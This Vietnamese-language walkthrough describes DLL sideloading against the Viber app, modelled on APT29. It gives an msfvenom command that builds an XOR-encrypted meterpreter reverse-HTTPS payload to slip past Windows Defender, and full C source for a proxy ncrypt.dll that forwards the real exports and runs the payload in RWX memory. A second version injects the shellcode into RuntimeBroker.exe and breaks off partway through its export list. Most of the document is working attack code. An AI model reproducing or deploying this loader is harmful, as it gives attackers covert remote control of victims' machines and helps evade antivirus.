DllSideload
Dựa trên APT29 nhưng đơn giản hơn
Sử dụng Process Monitor để tìm ra dll có thể lợi dụng. Ở đây mình sẽ filter các dll mà không tìm thấy ở thư mục root của phần mềm.
Ở đây mình sẽ tấn công vào ncrypt.dll, thứ mà ta sẽ kiếm được ở trong System32.
Tạo shellcode bằng msfvenom. Sử dụng xor để bypass Windows Defender.
Pass ở đây chính là pass mà APT29 đã sử dụng.
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.23.131 lport=4444 f raw -o viber.bin exitfunc=thread --encrypt xor --encrypt-key "jikoewarfkmzsdlhfnuiwaejrpaw" exitfunc=thread -v shellcode
Sử dụng tool SharpDllProxy để tạo ra dll phục vụ việc sideload
PS C:\Users\REDACTED\Desktop\SharpDllProxy\SharpDllProxy\bin\Release\netcoreapp3.1> .\SharpDllProxy.exe --dll .\ncrypt.dll --payload .\viber.bin
[+] Reading exports from C:\Users\REDACTED\Desktop\SharpDllProxy\SharpDllProxy\bin\Release\netcoreapp3.1\version.dll...
[+] Redirected 17 function calls from version.dll to tmp9CED.dll
[+] Exporting DLL C source to C:\Users\REDACTED\Desktop\SharpDllProxy\SharpDllProxy\bin\Release\netcoreapp3.1\output_version\version_pragma.c
Lấy code trong file ncrypt_pragma.c, replace tất cả chuỗi "tmp9CED" thành "ncrypts" và compile là ta sẽ có file ncrypt.dll:
#include "pch.h"
#include <stdio.h>
#include <stdlib.h>
#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)
#pragma comment(linker, "/export:BCryptAddContextFunction=ncrypts.BCryptAddContextFunction,@1")
#pragma comment(linker, "/export:BCryptAddContextFunctionProvider=ncrypts.BCryptAddContextFunctionProvider,@2")
#pragma comment(linker, "/export:BCryptCloseAlgorithmProvider=ncrypts.BCryptCloseAlgorithmProvider,@3")
#pragma comment(linker, "/export:BCryptConfigureContext=ncrypts.BCryptConfigureContext,@4")
#pragma comment(linker, "/export:BCryptConfigureContextFunction=ncrypts.BCryptConfigureContextFunction,@5")
#pragma comment(linker, "/export:BCryptCreateContext=ncrypts.BCryptCreateContext,@6")
#pragma comment(linker, "/export:BCryptCreateHash=ncrypts.BCryptCreateHash,@7")
#pragma comment(linker, "/export:BCryptDecrypt=ncrypts.BCryptDecrypt,@8")
#pragma comment(linker, "/export:BCryptDeleteContext=ncrypts.BCryptDeleteContext,@9")
#pragma comment(linker, "/export:BCryptDeriveKey=ncrypts.BCryptDeriveKey,@10")
#pragma comment(linker, "/export:BCryptDeriveKeyCapi=ncrypts.BCryptDeriveKeyCapi,@11")
#pragma comment(linker, "/export:BCryptDeriveKeyPBKDF2=ncrypts.BCryptDeriveKeyPBKDF2,@12")
#pragma comment(linker, "/export:BCryptDestroyHash=ncrypts.BCryptDestroyHash,@13")
#pragma comment(linker, "/export:BCryptDestroyKey=ncrypts.BCryptDestroyKey,@14")
#pragma comment(linker, "/export:BCryptDestroySecret=ncrypts.BCryptDestroySecret,@15")
#pragma comment(linker, "/export:BCryptDuplicateHash=ncrypts.BCryptDuplicateHash,@16")
#pragma comment(linker, "/export:BCryptDuplicateKey=ncrypts.BCryptDuplicateKey,@17")
#pragma comment(linker, "/export:BCryptEncrypt=ncrypts.BCryptEncrypt,@18")
#pragma comment(linker, "/export:BCryptEnumAlgorithms=ncrypts.BCryptEnumAlgorithms,@19")
#pragma comment(linker, "/export:BCryptEnumContextFunctionProviders=ncrypts.BCryptEnumContextFunctionProviders,@20")
#pragma comment(linker, "/export:BCryptEnumContextFunctions=ncrypts.BCryptEnumContextFunctions,@21")
#pragma comment(linker, "/export:BCryptEnumContexts=ncrypts.BCryptEnumContexts,@22")
#pragma comment(linker, "/export:BCryptEnumProviders=ncrypts.BCryptEnumProviders,@23")
#pragma comment(linker, "/export:BCryptEnumRegisteredProviders=ncrypts.BCryptEnumRegisteredProviders,@24")
#pragma comment(linker, "/export:BCryptExportKey=ncrypts.BCryptExportKey,@25")
#pragma comment(linker, "/export:BCryptFinalizeKeyPair=ncrypts.BCryptFinalizeKeyPair,@26")
#pragma comment(linker, "/export:BCryptFinishHash=ncrypts.BCryptFinishHash,@27")
#pragma comment(linker, "/export:BCryptFreeBuffer=ncrypts.BCryptFreeBuffer,@28")
#pragma comment(linker, "/export:BCryptGenRandom=ncrypts.BCryptGenRandom,@29")
#pragma comment(linker, "/export:BCryptGenerateKeyPair=ncrypts.BCryptGenerateKeyPair,@30")
#pragma comment(linker, "/export:BCryptGenerateSymmetricKey=ncrypts.BCryptGenerateSymmetricKey,@31")
#pragma comment(linker, "/export:BCryptGetFipsAlgorithmMode=ncrypts.BCryptGetFipsAlgorithmMode,@32")
#pragma comment(linker, "/export:BCryptGetProperty=ncrypts.BCryptGetProperty,@33")
#pragma comment(linker, "/export:BCryptHash=ncrypts.BCryptHash,@34")
#pragma comment(linker, "/export:BCryptHashData=ncrypts.BCryptHashData,@35")
#pragma comment(linker, "/export:BCryptImportKey=ncrypts.BCryptImportKey,@36")
#pragma comment(linker, "/export:BCryptImportKeyPair=ncrypts.BCryptImportKeyPair,@37")
#pragma comment(linker, "/export:BCryptKeyDerivation=ncrypts.BCryptKeyDerivation,@38")
#pragma comment(linker, "/export:BCryptOpenAlgorithmProvider=ncrypts.BCryptOpenAlgorithmProvider,@39")
#pragma comment(linker, "/export:BCryptQueryContextConfiguration=ncrypts.BCryptQueryContextConfiguration,@40")
#pragma comment(linker, "/export:BCryptQueryContextFunctionConfiguration=ncrypts.BCryptQueryContextFunctionConfiguration,@41")
#pragma comment(linker, "/export:BCryptQueryContextFunctionProperty=ncrypts.BCryptQueryContextFunctionProperty,@42")
#pragma comment(linker, "/export:BCryptQueryProviderRegistration=ncrypts.BCryptQueryProviderRegistration,@43")
#pragma comment(linker, "/export:BCryptRegisterConfigChangeNotify=ncrypts.BCryptRegisterConfigChangeNotify,@44")
#pragma comment(linker, "/export:BCryptRegisterProvider=ncrypts.BCryptRegisterProvider,@45")
#pragma comment(linker, "/export:BCryptRemoveContextFunction=ncrypts.BCryptRemoveContextFunction,@46")
#pragma comment(linker, "/export:BCryptRemoveContextFunctionProvider=ncrypts.BCryptRemoveContextFunctionProvider,@47")
#pragma comment(linker, "/export:BCryptResolveProviders=ncrypts.BCryptResolveProviders,@48")
#pragma comment(linker, "/export:BCryptSecretAgreement=ncrypts.BCryptSecretAgreement,@49")
#pragma comment(linker, "/export:BCryptSetAuditingInterface=ncrypts.BCryptSetAuditingInterface,@50")
#pragma comment(linker, "/export:BCryptSetContextFunctionProperty=ncrypts.BCryptSetContextFunctionProperty,@51")
#pragma comment(linker, "/export:BCryptSetProperty=ncrypts.BCryptSetProperty,@52")
#pragma comment(linker, "/export:BCryptSignHash=ncrypts.BCryptSignHash,@53")
#pragma comment(linker, "/export:BCryptUnregisterConfigChangeNotify=ncrypts.BCryptUnregisterConfigChangeNotify,@54")
#pragma comment(linker, "/export:BCryptUnregisterProvider=ncrypts.BCryptUnregisterProvider,@55")
#pragma comment(linker, "/export:BCryptVerifySignature=ncrypts.BCryptVerifySignature,@56")
#pragma comment(linker, "/export:GetIsolationServerInterface=ncrypts.GetIsolationServerInterface,@57")
#pragma comment(linker, "/export:GetKeyStorageInterface=ncrypts.GetKeyStorageInterface,@58")
#pragma comment(linker, "/export:GetSChannelInterface=ncrypts.GetSChannelInterface,@59")
#pragma comment(linker, "/export:NCryptCloseKeyProtector=ncrypts.NCryptCloseKeyProtector,@60")
#pragma comment(linker, "/export:NCryptCloseProtectionDescriptor=ncrypts.NCryptCloseProtectionDescriptor,@61")
#pragma comment(linker, "/export:NCryptCreateClaim=ncrypts.NCryptCreateClaim,@62")
#pragma comment(linker, "/export:NCryptCreatePersistedKey=ncrypts.NCryptCreatePersistedKey,@63")
#pragma comment(linker, "/export:NCryptCreateProtectionDescriptor=ncrypts.NCryptCreateProtectionDescriptor,@64")
#pragma comment(linker, "/export:NCryptDecrypt=ncrypts.NCryptDecrypt,@65")
#pragma comment(linker, "/export:NCryptDeleteKey=ncrypts.NCryptDeleteKey,@66")
#pragma comment(linker, "/export:NCryptDeriveKey=ncrypts.NCryptDeriveKey,@67")
#pragma comment(linker, "/export:NCryptDuplicateKeyProtectorHandle=ncrypts.NCryptDuplicateKeyProtectorHandle,@68")
#pragma comment(linker, "/export:NCryptEncrypt=ncrypts.NCryptEncrypt,@69")
#pragma comment(linker, "/export:NCryptEnumAlgorithms=ncrypts.NCryptEnumAlgorithms,@70")
#pragma comment(linker, "/export:NCryptEnumKeys=ncrypts.NCryptEnumKeys,@71")
#pragma comment(linker, "/export:NCryptEnumStorageProviders=ncrypts.NCryptEnumStorageProviders,@72")
#pragma comment(linker, "/export:NCryptExportKey=ncrypts.NCryptExportKey,@73")
#pragma comment(linker, "/export:NCryptFinalizeKey=ncrypts.NCryptFinalizeKey,@74")
#pragma comment(linker, "/export:NCryptFreeBuffer=ncrypts.NCryptFreeBuffer,@75")
#pragma comment(linker, "/export:NCryptFreeObject=ncrypts.NCryptFreeObject,@76")
#pragma comment(linker, "/export:NCryptGetProperty=ncrypts.NCryptGetProperty,@77")
#pragma comment(linker, "/export:NCryptGetProtectionDescriptorInfo=ncrypts.NCryptGetProtectionDescriptorInfo,@78")
#pragma comment(linker, "/export:NCryptImportKey=ncrypts.NCryptImportKey,@79")
#pragma comment(linker, "/export:NCryptIsAlgSupported=ncrypts.NCryptIsAlgSupported,@80")
#pragma comment(linker, "/export:NCryptIsKeyHandle=ncrypts.NCryptIsKeyHandle,@81")
#pragma comment(linker, "/export:NCryptKeyDerivation=ncrypts.NCryptKeyDerivation,@82")
#pragma comment(linker, "/export:NCryptNotifyChangeKey=ncrypts.NCryptNotifyChangeKey,@83")
#pragma comment(linker, "/export:NCryptOpenKey=ncrypts.NCryptOpenKey,@84")
#pragma comment(linker, "/export:NCryptOpenKeyProtector=ncrypts.NCryptOpenKeyProtector,@85")
#pragma comment(linker, "/export:NCryptOpenStorageProvider=ncrypts.NCryptOpenStorageProvider,@86")
#pragma comment(linker, "/export:NCryptProtectKey=ncrypts.NCryptProtectKey,@87")
#pragma comment(linker, "/export:NCryptProtectSecret=ncrypts.NCryptProtectSecret,@88")
#pragma comment(linker, "/export:NCryptQueryProtectionDescriptorName=ncrypts.NCryptQueryProtectionDescriptorName,@89")
#pragma comment(linker, "/export:NCryptRegisterProtectionDescriptorName=ncrypts.NCryptRegisterProtectionDescriptorName,@90")
#pragma comment(linker, "/export:NCryptSecretAgreement=ncrypts.NCryptSecretAgreement,@91")
#pragma comment(linker, "/export:NCryptSetAuditingInterface=ncrypts.NCryptSetAuditingInterface,@92")
#pragma comment(linker, "/export:NCryptSetProperty=ncrypts.NCryptSetProperty,@93")
#pragma comment(linker, "/export:NCryptSignHash=ncrypts.NCryptSignHash,@94")
#pragma comment(linker, "/export:NCryptStreamClose=ncrypts.NCryptStreamClose,@95")
#pragma comment(linker, "/export:NCryptStreamOpenToProtect=ncrypts.NCryptStreamOpenToProtect,@96")
#pragma comment(linker, "/export:NCryptStreamOpenToUnprotect=ncrypts.NCryptStreamOpenToUnprotect,@97")
#pragma comment(linker, "/export:NCryptStreamOpenToUnprotectEx=ncrypts.NCryptStreamOpenToUnprotectEx,@98")
#pragma comment(linker, "/export:NCryptStreamUpdate=ncrypts.NCryptStreamUpdate,@99")
#pragma comment(linker, "/export:NCryptTranslateHandle=ncrypts.NCryptTranslateHandle,@100")
#pragma comment(linker, "/export:NCryptUnprotectKey=ncrypts.NCryptUnprotectKey,@101")
#pragma comment(linker, "/export:NCryptUnprotectSecret=ncrypts.NCryptUnprotectSecret,@102")
#pragma comment(linker, "/export:NCryptVerifyClaim=ncrypts.NCryptVerifyClaim,@103")
#pragma comment(linker, "/export:NCryptVerifySignature=ncrypts.NCryptVerifySignature,@104")
#pragma comment(linker, "/export:SslChangeNotify=ncrypts.SslChangeNotify,@105")
#pragma comment(linker, "/export:SslComputeClientAuthHash=ncrypts.SslComputeClientAuthHash,@106")
#pragma comment(linker, "/export:SslComputeEapKeyBlock=ncrypts.SslComputeEapKeyBlock,@107")
#pragma comment(linker, "/export:SslComputeFinishedHash=ncrypts.SslComputeFinishedHash,@108")
#pragma comment(linker, "/export:SslComputeSessionHash=ncrypts.SslComputeSessionHash,@109")
#pragma comment(linker, "/export:SslCreateClientAuthHash=ncrypts.SslCreateClientAuthHash,@110")
#pragma comment(linker, "/export:SslCreateEphemeralKey=ncrypts.SslCreateEphemeralKey,@111")
#pragma comment(linker, "/export:SslCreateHandshakeHash=ncrypts.SslCreateHandshakeHash,@112")
#pragma comment(linker, "/export:SslDecrementProviderReferenceCount=ncrypts.SslDecrementProviderReferenceCount,@113")
#pragma comment(linker, "/export:SslDecryptPacket=ncrypts.SslDecryptPacket,@114")
#pragma comment(linker, "/export:SslDeriveSessionTicketKey=ncrypts.SslDeriveSessionTicketKey,@115")
#pragma comment(linker, "/export:SslDuplicateTranscriptHash=ncrypts.SslDuplicateTranscriptHash,@116")
#pragma comment(linker, "/export:SslEncryptPacket=ncrypts.SslEncryptPacket,@117")
#pragma comment(linker, "/export:SslEnumCipherSuites=ncrypts.SslEnumCipherSuites,@118")
#pragma comment(linker, "/export:SslEnumCipherSuitesEx=ncrypts.SslEnumCipherSuitesEx,@119")
#pragma comment(linker, "/export:SslEnumEccCurves=ncrypts.SslEnumEccCurves,@120")
#pragma comment(linker, "/export:SslEnumProtocolProviders=ncrypts.SslEnumProtocolProviders,@121")
#pragma comment(linker, "/export:SslExpandBinderKey=ncrypts.SslExpandBinderKey,@122")
#pragma comment(linker, "/export:SslExpandExporterMasterKey=ncrypts.SslExpandExporterMasterKey,@123")
#pragma comment(linker, "/export:SslExpandNextGenTrafficKey=ncrypts.SslExpandNextGenTrafficKey,@124")
#pragma comment(linker, "/export:SslExpandPreSharedKey=ncrypts.SslExpandPreSharedKey,@125")
#pragma comment(linker, "/export:SslExpandResumptionMasterKey=ncrypts.SslExpandResumptionMasterKey,@126")
#pragma comment(linker, "/export:SslExpandTrafficKeys=ncrypts.SslExpandTrafficKeys,@127")
#pragma comment(linker, "/export:SslExpandWriteKey=ncrypts.SslExpandWriteKey,@128")
#pragma comment(linker, "/export:SslExportKey=ncrypts.SslExportKey,@129")
#pragma comment(linker, "/export:SslExportKeyingMaterial=ncrypts.SslExportKeyingMaterial,@130")
#pragma comment(linker, "/export:SslExtractEarlyKey=ncrypts.SslExtractEarlyKey,@131")
#pragma comment(linker, "/export:SslExtractHandshakeKey=ncrypts.SslExtractHandshakeKey,@132")
#pragma comment(linker, "/export:SslExtractMasterKey=ncrypts.SslExtractMasterKey,@133")
#pragma comment(linker, "/export:SslFreeBuffer=ncrypts.SslFreeBuffer,@134")
#pragma comment(linker, "/export:SslFreeObject=ncrypts.SslFreeObject,@135")
#pragma comment(linker, "/export:SslGenerateMasterKey=ncrypts.SslGenerateMasterKey,@136")
#pragma comment(linker, "/export:SslGeneratePreMasterKey=ncrypts.SslGeneratePreMasterKey,@137")
#pragma comment(linker, "/export:SslGenerateSessionKeys=ncrypts.SslGenerateSessionKeys,@138")
#pragma comment(linker, "/export:SslGetCipherSuitePRFHashAlgorithm=ncrypts.SslGetCipherSuitePRFHashAlgorithm,@139")
#pragma comment(linker, "/export:SslGetKeyProperty=ncrypts.SslGetKeyProperty,@140")
#pragma comment(linker, "/export:SslGetProviderProperty=ncrypts.SslGetProviderProperty,@141")
#pragma comment(linker, "/export:SslGetSessionTicketProtectionHeaderSize=ncrypts.SslGetSessionTicketProtectionHeaderSize,@142")
#pragma comment(linker, "/export:SslHashHandshake=ncrypts.SslHashHandshake,@143")
#pragma comment(linker, "/export:SslImportKey=ncrypts.SslImportKey,@144")
#pragma comment(linker, "/export:SslImportMasterKey=ncrypts.SslImportMasterKey,@145")
#pragma comment(linker, "/export:SslIncrementProviderReferenceCount=ncrypts.SslIncrementProviderReferenceCount,@146")
#pragma comment(linker, "/export:SslLookupCipherLengths=ncrypts.SslLookupCipherLengths,@147")
#pragma comment(linker, "/export:SslLookupCipherSuiteInfo=ncrypts.SslLookupCipherSuiteInfo,@148")
#pragma comment(linker, "/export:SslOpenPrivateKey=ncrypts.SslOpenPrivateKey,@149")
#pragma comment(linker, "/export:SslOpenProvider=ncrypts.SslOpenProvider,@150")
#pragma comment(linker, "/export:SslProtectSessionTicket=ncrypts.SslProtectSessionTicket,@151")
#pragma comment(linker, "/export:SslSignHash=ncrypts.SslSignHash,@152")
#pragma comment(linker, "/export:SslUnprotectSessionTicket=ncrypts.SslUnprotectSessionTicket,@153")
#pragma comment(linker, "/export:SslVerifySignature=ncrypts.SslVerifySignature,@154")
// Thread start routine (started from the CreateThread call in DllMain below):
// reads the payload file from disk into memory and executes it inside the
// host process. Returns 0 only if the payload itself returns.
//
// What this block leaves observable to a defender:
//  * a read of "viber.bin", resolved against the host process's current directory;
//  * a private PAGE_EXECUTE_READWRITE allocation that is immediately called into,
//    the classic indicator memory scanners look for.
// Note: there is no decoding step in this variant, so it only runs a plain
// payload; the writeup below says the xor-encrypted msfvenom output needs the
// second version of the code.
DWORD WINAPI DoMagic(LPVOID lpParameter)
{
//https://stackoverflow.com/questions/14002954/c-programming-how-to-read-the-whole-file-contents-into-a-buffer
FILE* fp;
size_t size;
unsigned char* buffer;
// Relative path: the loader depends on the working directory of the launching executable.
// The return value is not checked, so a missing file most likely crashes the host in the fseek below.
fp = fopen("viber.bin", "rb");
fseek(fp, 0, SEEK_END);
// File length doubles as the payload size; an ftell() failure (-1) is not handled.
size = ftell(fp);
fseek(fp, 0, SEEK_SET);
buffer = (unsigned char*)malloc(size);
//https://ired.team/offensive-security/code-injection-process-injection/loading-and-executing-shellcode-from-portable-executable-resources
// Short reads are not detected; fp is never fclose()d and buffer is never freed.
fread(buffer, size, 1, fp);
// RWX private memory, then a plain memcpy of the file contents into it.
void* exec = VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, buffer, size);
// Transfers control to the payload; the 0 below is only reached if the payload returns.
((void(*) ())exec)();
return 0;
}
// Entry point of the proxy DLL. The real API surface is forwarded by the linker
// /export pragmas above to a module named "ncrypts" (presumably the renamed
// original ncrypt.dll, following the tmp9CED -> ncrypts rename in the writeup),
// so the host application keeps working while this entry point starts the payload.
// Always returns TRUE, i.e. the load never fails from the host's point of view.
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
HANDLE threadHandle;
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
// https://gist.github.com/securitytube/c956348435cc90b8e1f7
// Create a thread and close the handle as we do not want to use it to wait for it
// Detection-relevant: a new thread whose start address (DoMagic) lies in a DLL
// that was just loaded from the application directory rather than System32.
// CreateThread's result is not checked before the handle is closed.
threadHandle = CreateThread(NULL, 0, DoMagic, NULL, 0, NULL);
CloseHandle(threadHandle);
// No break here: control falls through into DLL_THREAD_ATTACH, which only
// breaks, so the fallthrough has no effect.
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
DLL này dùng cho payload thường nên nó sẽ hoạt động khi không bật AV. Tuy nhiên payload của chúng ta đã được mã hóa để bypass Windef, nên ta phải sửa code để có thể xor lại payload. Tham khảo: https://github.com/ChoiSG/OneDriveUpdaterSideloading/blob/main/version/dllmain.cpp
Code này ngoài ra còn inject shellcode vào tiến trình RunTimeBroker.exe để chạy reverse shell, thay vì chạy trực tiếp trong tiến trình viber.
#include "pch.h"
#include <Windows.h>
#include <TlHelp32.h>
#include <stdlib.h>
#include "CreateSection.h"
#pragma comment(lib, "ntdll")
#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)
#pragma comment(linker, "/export:BCryptAddContextFunction=ncrypts.BCryptAddContextFunction,@1")
#pragma comment(linker, "/export:BCryptAddContextFunctionProvider=ncrypts.BCryptAddContextFunctionProvider,@2")
#pragma comment(linker, "/export:BCryptCloseAlgorithmProvider=ncrypts.BCryptCloseAlgorithmProvider,@3")
#pragma comment(linker, "/export:BCryptConfigureContext=ncrypts.BCryptConfigureContext,@4")
#pragma comment(linker, "/export:BCryptConfigureContextFunction=ncrypts.BCryptConfigureContextFunction,@5")
#pragma comment(linker, "/export:BCryptCreateContext=ncrypts.BCryptCreateContext,@6")
#pragma comment(linker, "/export:BCryptCreateHash=ncrypts.BCryptCreateHash,@7")
#pragma comment(linker, "/export:BCryptDecrypt=ncrypts.BCryptDecrypt,@8")
#pragma comment(linker, "/export:BCryptDeleteContext=ncrypts.BCryptDeleteContext,@9")
#pragma comment(linker, "/export:BCryptDeriveKey=ncrypts.BCryptDeriveKey,@10")
#pragma comment(linker, "/export:BCryptDeriveKeyCapi=ncrypts.BCryptDeriveKeyCapi,@11")
#pragma comment(linker, "/export:BCryptDeriveKeyPBKDF2=ncrypts.BCryptDeriveKeyPBKDF2,@12")
#pragma comment(linker, "/export:BCryptDestroyHash=ncrypts.BCryptDestroyHash,@13")
#pragma comment(linker, "/export:BCryptDestroyKey=ncrypts.BCryptDestroyKey,@14")
#pragma comment(linker, "/export:BCryptDestroySecret=ncrypts.BCryptDestroySecret,@15")
#pragma comment(linker, "/export:BCryptDuplicateHash=ncrypts.BCryptDuplicateHash,@16")
#pragma comment(linker, "/export:BCryptDuplicateKey=ncrypts.BCryptDuplicateKey,@17")
#pragma comment(linker, "/export:BCryptEncrypt=ncrypts.BCryptEncrypt,@18")
#pragma comment(linker, "/export:BCryptEnumAlgorithms=ncrypts.BCryptEnumAlgorithms,@19")
#pragma comment(linker, "/export:BCryptEnumContextFunctionProviders=ncrypts.BCryptEnumContextFunctionProviders,@20")
#pragma comment(linker, "/export:BCryptEnumContextFunctions=ncrypts.BCryptEnumContextFunctions,@21")
#pragma comment(linker, "/export:BCryptEnumContexts=ncrypts.BCryptEnumContexts,@22")
#pragma comment(linker, "/export:BCryptEnumProviders=ncrypts.BCryptEnumProviders,@23")
#pragma comment(linker, "/export:BCryptEnumRegisteredProviders=ncrypts.BCryptEnumRegisteredProviders,@24")
#pragma comment(linker, "/export:BCryptExportKey=ncrypts.BCryptExportKey,@25")
#pragma comment(linker, "/export:BCryptFinalizeKeyPair=ncrypts.BCryptFinalizeKeyPair,@26")
#pragma comment(linker, "/export:BCryptFinishHash=ncrypts.BCryptFinishHash,@27")
#pragma comment(linker, "/export:BCryptFreeBuffer=ncrypts.BCryptFreeBuffer,@28")
#pragma comment(linker, "/export:BCryptGenRandom=ncrypts.BCryptGenRandom,@29")
#pragma comment(linker, "/export:BCryptGenerateKeyPair=ncrypts.BCryptGenerateKeyPair,@30")
#pragma comment(linker, "/export:BCryptGenerateSymmetricKey=ncrypts.BCryptGenerateSymmetricKey,@31")
#pragma comment(linker, "/export:BCryptGetFipsAlgorithmMode=ncrypts.BCryptGetFipsAlgorithmMode,@32")
#pragma comment(linker, "/export:BCryptGetProperty=ncrypts.BCryptGetProperty,@33")
#pragma comment(linker, "/export:BCryptHash=ncrypts.BCryptHash,@34")
#pragma comment(linker, "/export:BCryptHashData=ncrypts.BCryptHashData,@35")
#pragma comment(linker, "/export:BCryptImportKey=ncrypts.BCryptImportKey,@36")
#pragma comment(linker, "/export:BCryptImportKeyPair=ncrypts.BCryptImportKeyPair,@37")
#pragma comment(linker, "/export:BCryptKeyDerivation=ncrypts.BCryptKeyDerivation,@38")
#pragma comment(linker, "/export:BCryptOpenAlgorithmProvider=ncrypts.BCryptOpenAlgorithmProvider,@39")
#pragma comment(linker, "/export:BCryptQueryContextConfiguration=ncrypts.BCryptQueryContextConfiguration,@40")
#pragma comment(linker, "/export:BCryptQueryContextFunctionConfiguration=ncrypts.BCryptQueryContextFunctionConfiguration,@41")
#pragma comment(linker, "/export:BCryptQueryContextFunctionProperty=ncrypts.BCryptQueryContextFunctionProperty,@42")
#pragma comment(linker, "/export:BCryptQueryProviderRegistration=ncrypts.BCryptQueryProviderRegistration,@43")
#pragma comment(linker, "/export:BCryptRegisterConfigChangeNotify=ncrypts.BCryptRegisterConfigChangeNotify,@44")
#pragma comment(linker, "/export:BCryptRegisterProvider=ncrypts.BCryptRegisterProvider,@45")
#pragma comment(linker, "/export:BCryptRemoveContextFunction=ncrypts.BCryptRemoveContextFunction,@46")
#pragma comment(linker, "/export:BCryptRemoveContextFunctionProvider=ncrypts.BCryptRemoveContextFunctionProvider,@47")
#pragma comment(linker, "/export:BCryptResolveProviders=ncrypts.BCryptResolveProviders,@48")
#pragma comment(linker, "/export:BCryptSecretAgreement=ncrypts.BCryptSecretAgreement,@49")
#pragma comment(linker, "/export:BCryptSetAuditingInterface=ncrypts.BCryptSetAuditingInterface,@50")
#pragma comment(linker, "/export:BCryptSetContextFunctionProperty=ncrypts.BCryptSetContextFunctionProperty,@51")
#pragma comment(linker, "/export:BCryptSetProperty=ncrypts.BCryptSetProperty,@52")
#pragma comment(linker, "/export:BCryptSignHash=ncrypts.BCryptSignHash,@53")
#pragma comment(linker, "/export:BCryptUnregisterConfigChangeNotify=ncrypts.BCryptUnregisterConfigChangeNotify,@54")
#pragma comment(linker, "/export:BCryptUnregisterProvider=ncrypts.BCryptUnregisterProvider,@55")
#pragma comment(linker, "/export:BCryptVerifySignature=ncrypts.BCryptVerifySignature,@56")
#pragma comment(linker, "/export:GetIsolationServerInterface=ncrypts.GetIsolationServerInterface,@57")
#pragma comment(linker, "/export:GetKeyStorageInterface=ncrypts.GetKeyStorageInterface,@58")
#pragma comment(linker, "/export:GetSChannelInterface=ncrypts.GetSChannelInterface,@59")
#pragma comment(linker, "/export:NCryptCloseKeyProtector=ncrypts.NCryptCloseKeyProtector,@60")
#pragma comment(linker, "/export:NCryptCloseProtectionDescriptor=ncrypts.NCryptCloseProtectionDescriptor,@61")
#pragma comment(linker, "/export:NCryptCreateClaim=ncrypts.NCryptCreateClaim,@62")
#pragma comment(linker, "/export:NCryptCreatePersistedKey=ncrypts.NCryptCreatePersistedKey,@63")
#pragma comment(linker, "/export:NCryptCreateProtectionDescriptor=ncrypts.NCryptCreateProtectionDescriptor,@64")
#pragma comment(linker, "/export:NCryptDecrypt=ncrypts.NCryptDecrypt,@65")
#pragma comment(linker, "/export:NCryptDeleteKey=ncrypts.NCryptDeleteKey,@66")
#pragma comment(linker, "/export:NCryptDeriveKey=ncrypts.NCryptDeriveKey,@67")
#pragma comment(linker, "/export:NCryptDuplicateKeyProtectorHandle=ncrypts.NCryptDuplicateKeyProtectorHandle,@68")
#pragma comment(linker, "/export:NCryptEncrypt=ncrypts.NCryptEncrypt,@69")
#pragma comment(linker, "/export:NCryptEnumAlgorithms=ncrypts.NCryptEnumAlgorithms,@70")
#pragma comment(linker, "/export:NCryptEnumKeys=ncrypts.NCryptEnumKeys,@71")
#pragma comment(linker, "/export:NCryptEnumStorageProviders=ncrypts.NCryptEnumStorageProviders,@72")
#pragma comment(linker, "/export:NCryptExportKey=ncrypts.NCryptExportKey,@73")
#pragma comment(linker, "/export:NCryptFinalizeKey=ncrypts.NCryptFinalizeKey,@74")
#pragma comment(linker, "/export:NCryptFreeBuffer=ncrypts.NCryptFreeBuffer,@75")
#pragma comment(linker, "/export:NCryptFreeObject=ncrypts.NCryptFreeObject,@76")
#pragma comment(linker, "/export:NCryptGetProperty=ncrypts.NCryptGetProperty,@77")
#pragma comment(linker, "/export:NCryptGetProtectionDescriptorInfo=ncrypts.NCryptGetProtectionDescriptorInfo,@78")
#pragma comment(linker, "/export:NCryptImportKey=ncrypts.NCryptImportKey,@79")
#pragma comment(linker, "/export:NCryptIsAlgSupported=ncrypts.NCryptIsAlgSupported,@80")
#pragma comment(linker, "/export:NCryptIsKeyHandle=ncrypts.NCryptIsKeyHandle,@81")
#pragma comment(linker, "/export:NCryptKeyDerivation=ncrypts.NCryptKeyDerivation,@82")
#pragma comment(linker, "/export:NCryptNotifyChangeKey=ncrypts.NCryptNotifyChangeKey,@83")
#pragma comment(linker, "/export:NCryptOpenKey=ncrypts.NCryptOpenKey,@84")
#pragma comment(linker, "/export:NCryptOpenKeyProtector=ncrypts.NCryptOpenKeyProtector,@85")
#pragma comment(linker, "/export:NCryptOpenStorageProvider=ncrypts.NCryptOpenStorageProvider,@86")
#pragma comment(linker, "/export:NCryptProtectKey=ncrypts.NCryptProtectKey,@87")
#pragma comment(linker, "/export:NCryptProtectSecret=ncrypts.NCryptProtectSecret,@88")
#pragma comment(linker, "/export:NCryptQueryProtectionDescriptorName=ncrypts.NCryptQueryProtectionDescriptorName,@89")
#pragma comment(linker, "/export:NCryptRegisterProtectionDescriptorName=ncrypts.NCryptRegisterProtectionDescriptorName,@90")
#pragma comment(linker, "/export:NCryptSecretAgreement=ncrypts.NCryptSecretAgreement,@91")
#pragma comment(linker, "/export:NCryptSetAuditingInterface=ncrypts.NCryptSetAuditingInterface,@92")
#pragma comment(linker, "/export:NCryptSetProperty=ncrypts.NCryptSetProperty,@93")
#pragma comment(linker, "/export:NCryptSignHash=ncrypts.NCryptSignHash,@94")
#pragma comment(linker, "/export:NCryptStreamClose=ncrypts.NCryptStreamClose,@95")
#pragma comment(linker, "/export:NCryptStreamOpenToProtect=ncrypts.NCryptStreamOpenToProtect,@96")
#pragma comment(linker, "/export:NCryptStreamOpenToUnprotect=ncrypts.NCryptStreamOpenToUnprotect,@97")
#pragma comment(linker, "/export:NCryptStreamOpenToUnprotectEx=ncrypts.NCryptStreamOpenToUnprotectEx,@98")
#pragma comment(linker, "/export:NCryptStreamUpdate=ncrypts.NCryptStreamUpdate,@99")
#pragma comment(linker, "/export:NCryptTranslateHandle=ncrypts.NCryptTranslateHandle,@100")
#pragma comment(linker, "/export:NCryptUnprotectKey=ncrypts.NCryptUnprotectKey,@101")
